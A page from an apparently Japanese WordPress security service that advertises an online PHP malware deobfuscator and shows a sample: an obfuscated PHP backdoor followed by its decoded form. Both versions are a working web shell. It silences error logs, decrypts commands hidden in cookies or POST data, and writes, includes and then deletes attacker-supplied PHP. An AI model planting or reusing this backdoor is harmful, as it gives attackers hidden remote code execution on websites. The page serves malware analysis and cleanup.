Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php $flvzvgegr = "\x66".'i'."\154"."\x65".'_'.chr(112)."\x75".chr(538-422)."\x5f"."\143"."\x6f"."\x6e".'t'.chr(322-221)."\x6e".'t'."\x73"; $ohncpojjrf = chr(783-685)."\141".'s'.chr(101)."\x36".'4'.chr(307-212).chr(100).'e'."\x63".'o'.chr(100)."\145"; $jhtxsphk = chr(643-538)."\x6e".chr(105).chr(750-655).'s'.chr(271-170).'t'; $btfasdl = "\165".'n'."\x6c"."\151".chr(581-471)."\153"; @$jhtxsphk(chr(101)."\162"."\x72".chr(965-854)."\x72".chr(95)."\154".chr(1086-975)."\147", NULL); @$jhtxsphk("\154"."\157".'g'."\x5f".chr(101)."\162"."\162".chr(111).chr(114)."\163", 0); @$jhtxsphk(chr(228-119)."\141".chr(1051-931)."\137".'e'."\x78"."\145"."\x63"."\x75".'t'.'i'.'o'.chr(480-370)."\137".chr(116)."\151".'m'."\x65", 0); @set_time_limit(0); function gifkgij($rjhcijylka, $tqqnbe) { $mbekllnfeonksjr = ""; for ($mbeklln = 0; $mbeklln < strlen($rjhcijylka);) { for ($j = 0; $j < strlen($tqqnbe) && $mbeklln < strlen($rjhcijylka); $j++, $mbeklln++) { $mbekllnfeonksjr .= chr(ord($rjhcijylka[$mbeklln]) ^ ord($tqqnbe[$j])); } } return $mbekllnfeonksjr; } $mbekllnaubluam = array_merge($_COOKIE, $_POST); $haonvcs = '79de70f0-5552-453b-a8fc-40691d920c31'; foreach ($mbekllnaubluam as $xxziytpuc => $rjhcijylka) { $rjhcijylka = @unserialize(gifkgij(gifkgij($ohncpojjrf($rjhcijylka), $haonvcs), $xxziytpuc)); if (isset($rjhcijylka['a'.chr(476-369)])) { if ($rjhcijylka['a'] == chr(364-259)) { $mbeklln = array( "\x70"."\x76" => @phpversion(), "\163"."\x76" => "3.5", ); echo @serialize($mbeklln); } elseif ($rjhcijylka['a'] == 'e') { $tonqjgji = "./" . md5($haonvcs) . '.'.'i'."\156".'c'; @$flvzvgegr($tonqjgji, "<" . chr(63)."\x70"."\x68".chr(988-876)."\40".chr(1006-942)."\x75"."\156".chr(108)."\x69".chr(1055-945)."\x6b".chr(40).'_'.chr(95).'F'."\x49".chr(76)."\105".chr(309-214)."\x5f"."\x29".chr(59)."\40" . $rjhcijylka[chr(115-15)]); @include($tonqjgji); @$btfasdl($tonqjgji); } exit(); } }
<?php $flvzvgegr = "file_put_contents"; $ohncpojjrf = "base64_decode"; $jhtxsphk = "ini_set"; $btfasdl = "unlink"; @ini_set("error_log", NULL); @ini_set("log_errors", 0); @ini_set("max_execution_time", 0); @set_time_limit(0); function gifkgij($rjhcijylka, $tqqnbe) { $mbekllnfeonksjr = ""; for ($mbeklln = 0; $mbeklln < strlen($rjhcijylka);) { for ($j = 0; $j < strlen($tqqnbe) && $mbeklln < strlen($rjhcijylka); $j++, $mbeklln++) { $mbekllnfeonksjr .= chr(ord($rjhcijylka[$mbeklln]) ^ ord($tqqnbe[$j])); } } return $mbekllnfeonksjr; } $mbekllnaubluam = array_merge($_COOKIE, $_POST); $haonvcs = '79de70f0-5552-453b-a8fc-40691d920c31'; foreach ($mbekllnaubluam as $xxziytpuc => $rjhcijylka) { $rjhcijylka = @unserialize(gifkgij(gifkgij($ohncpojjrf($rjhcijylka), $haonvcs), $xxziytpuc)); if (isset($rjhcijylka["ak"])) { if ($rjhcijylka['a'] == "i") { $mbeklln = array("pv" => @phpversion(), "sv" => "3.5"); echo @serialize($mbeklln); } elseif ($rjhcijylka['a'] == 'e') { $tonqjgji = "./" . md5($haonvcs) . '.' . 'i' . "n" . 'c'; @$flvzvgegr($tonqjgji, "<?php @unlink(__FILE__); " . $rjhcijylka["d"]); @(include $tonqjgji); @$btfasdl($tonqjgji); } exit; } }
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.